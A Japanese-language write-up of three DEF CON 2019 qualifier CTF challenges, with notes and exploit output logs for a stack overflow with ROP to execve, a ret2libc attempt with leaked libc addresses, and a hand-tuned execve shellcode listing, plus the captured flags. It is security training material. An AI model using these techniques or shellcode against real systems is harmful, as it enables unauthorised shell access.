DEF CON CTF Qualifier 2019 speedrun-001~003
speedrun-001
$ ./speedrun-001
Hello brave new challenger
Any last words?
hoge
This will be the last thing that you say: hoge
Alas, you had no luck today.
バッファオーバーフローがあるので,ROPで execve("/bin/sh", NULL, NULL)
を呼ぶようにした.
$ python exploit.py [+] Opening connection to speedrun-001.quals2019.oooverflow.io on port 31337: Done Hello brave new challenger Any last words? [*] Switching to interactive mode This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x06@ $ ls - banner_fail bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin service.conf speedrun-001 srv sys tmp usr var wrapper $ cat /flag OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.} [*] Got EOF while reading in interactive
speedrun-002
$ ./speedrun-002
We meet again on these pwning streets.
What say you now?
hoge
What a ho-hum thing to say.
Fare thee well.
これも同様バッファオーバーフローがあり,ROPからret2libcでsystemを呼ぼうとしたがローカルではうまくいくのにリモートではうまくいかない問題が起きてて,どうやらリモートではsystem関数が使えないように制限されてたっぽいので,001同様直接システムコールを使うようにしたらシェルが取れた.
$ python exploit.py [+] Opening connection to speedrun-002.quals2019.oooverflow.io on port 31337: Done [*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled We meet again on these pwning streets. What say you now? What an interesting thing to say. Tell me more. Fascinating. leak_addr: 0x7f4b03669140 libc_base: 0x7f4b03559000 system_addr: 0x7f4b035a8440 We meet again on these pwning streets. What say you now? What an interesting thing to say. Tell me more. Fascinating. [*] Switching to interactive mode $ cat /flag OOO{I_didn't know p1zzA places__mAde pwners.} $ exit [*] Got EOF while reading in interactive
speedrun-003
$ ./speedrun-003 Think you can drift? Send me your drift hoge You're not ready.
シェルコード問題.30バイトのシェルコードを入力する必要があり,前半部分それぞれをxorした値と後半部分それぞれをxorした値が等しくないといけない.
48 bb 2f 62 69 6e 2f movabs rbx,0x68732f6e69622f 73 68 00 31 f6 xor esi,esi 56 push rsi 53 push rbx 54 push rsp 5f pop rdi b0 3b mov al,0x3b 31 d2 xor edx,edx 0f 05 syscall
シェルコードはこのようなものを使用したが,これは22バイトなのでいい感じに調整した.具体的には,前半部分を push rsp
までにして,残りの部分は xor edx, edx
を4つに増やすことでバイト数をかさ増ししたり,同じxor値になるように mov al, 0x3b
を2つに増やし,前半の 0x3b
の部分を変化させながら,最終的に mov al, 0x5a
にした.
$ python exploit.py [+] Opening connection to speedrun-003.quals2019.oooverflow.io on port 31337: Done [*] Switching to interactive mode Think you can drift? Send me your drift $ cat /flag OOO{Fifty percent of something is better than a hundred percent of nothing. (except when it comes to pwning)} $ exit [*] Got EOF while reading in interactive